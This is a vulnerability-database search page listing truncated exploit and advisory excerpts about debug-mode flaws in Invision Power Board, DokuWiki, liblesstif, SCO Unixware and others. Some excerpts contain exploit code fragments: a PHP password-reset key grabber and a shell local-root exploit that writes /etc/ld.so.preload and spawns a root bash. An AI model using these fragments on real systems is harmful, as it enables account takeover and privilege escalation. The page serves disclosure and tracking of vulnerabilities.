8149 matches found
Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
No description provided by source. ?php / Debug Mode password change vulnerability Affects Invision Power Borard 2.0.0 to 2.1.7 by Rapigator This works if: "Debug Level" is set to 3 or Enable SQL Debug Mode is turned on In General Configuration of the forum software. / // The forum's address up t...
[Full-disclosure] Invision Power Board 2.1.7 debug mode vulnerability
Debug mode is a feature in IPB 2.0.0-2.1.7 that shows all database queries for each forum page requested. If Debug mode is turned on, it is possible for anyone to request a forgotten password for an account, and capture the validation key that is sent to the account's email address. This allows a...
Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Exploit for unknown platform in category web applications ==================================================================== Invision Power Board INSERT INTO \w?regantispam \regid,regcode,ipaddress,ctime\ VALUES\'\w32?',\d?,/', $page, $regs $prefix = $regs1; $regid = $regs2; $regcode =...
Invision Power Board 2.1.7 - 'Debug' Remote Password Change
INSERT INTO \w?regantispam \regid,regcode,ipaddress,ctime\ VALUES\'\w32?',\d?,/', $page, $regs $prefix = $regs1; $regid = $regs2; $regcode = $regs3; else $suffix = "&debug=1"; $curl = curlinit$site.'act=Reg&CODE=10'.$suffix; curlsetopt$curl, CURLOPTPROXY, $proxy; curlsetopt$curl,...
Invision Power Board 2.1.7 - Debug Remote Password Change
Invision Power Board 2.1.7 - Debug Remote Password Change INSERT INTO \w?regantispam \regid,regcode,ipaddress,ctime\ VALUES\'\w32?',\d?,/', $page, $regs $prefix = $regs1; $regid = $regs2; $regcode = $regs3; else $suffix = "&debug=1"; $curl = curlinit$site.'act=Reg&CODE=10'.$suffix;...
SCO Unixware 7.1.3 (ptrace) Local Privilege Escalation Exploit
No description provided by source. / SCO Unixware 7.1.3 ptrace local root exploit ============================================ SCO Unixware 7.1.3 kernel allows unprivledged users to debug binaries. The condition can be exploited by an attacker when he has execute permissions to a file which has t...
liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit
No description provided by source. !/bin/sh echo echo "mtink libXm local root exploit" echo " [email protected] " echo umask 000 export DEBUGFILE="/etc/ld.so.preload" cat /tmp/lib.c EOF include unistd.h void initvoid if getuid!=0 && geteuid==0 setuid0; unlink"/etc/ld.so.preload"; execl"/bin/bash",...
FreeBSD : dokuwiki -- multiple vulnerabilities (fcba5764-506a-11db-a5ae-00508d6a62df)
Secunia reports : rgod has discovered a vulnerability in DokuWiki, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the 'TARGETFN' parameter in bin/dwpage.php is not properly sanitised before being used to copy files. This can be exploited via director...
[SA22041] Fi Win WiFi Phone SS28S Debug Console Security Issue
---------------------------------------------------------------------- Want to work within IT-Security? Secunia is expanding its team of highly skilled security experts. We will help with relocation and obtaining a work permit. Currently the following type of positions are available:...
FiWin SS28S Wi-Fi phones backdoor account
Phone has debug console with telnet access and hardcoded account 1 with password 1...
Free kill often with a few important tools-vulnerability warning-the black bar safety net
C32Asm V0. 4. 1 2 C32Asm is set reverse assemble, 1 6 hex tools, Hiew modify the features and integration PE Explorer 1.98 Powerful resource tool, can directly Browse and modify the software resources, including menus, dialog boxes, string tables, etc.; in addition, also equipped with W32DASM...
BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion
Title : Bcwb 0.99rootpathRemote File Include Vulnerability Author : ajann Greetz : shadow and Suskun for host : Exploit; File startup.inc.php /File Code,1 startup.inc.php Error: .. .... // Debug services include$rootpath.'include/startup/debug.inc.php';...
CVE-2006-4679
DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...
CVE-2006-4679
DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...
CVE-2006-4679
DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...
CVE-2006-4679
DokuWiki prior to 2006-03-09c is vulnerable: it enables the debug feature by default, allowing remote attackers to obtain sensitive information via doku.php when the X-DOKUWIKI-DO header is set to "debug". The issue is confirmed across multiple sources (NVD/OpenVAS/Gentoo GLSA). A remediation bar...
CVE-2006-4679
DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...
CVE-2006-4679
DokuWiki before 2006-03-09c enables the debug feature by default, which allows remote attackers to obtain sensitive information by calling doku.php with the X-DOKUWIKI-DO HTTP header set to "debug"...
dokuwiki -- multiple vulnerabilities
Secunia reports: rgod has discovered a vulnerability in DokuWiki, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the "TARGETFN" parameter in bin/dwpage.php is not properly sanitised before being used to copy files. This can be exploited via directory...
DokuWiki 2006-03-09b - 'dwpage.php' Remote Code Execution
!/usr/bin/php -q -d shortopentag=on ? printr' -------------------------------------------------------------------------------- DokuWiki = 2006-03-09b release /bin/dwpage.php remote commands execution xploit by rgod [email protected] site: http://retrogod.altervista.org dork: "Driven by DokuWiki"...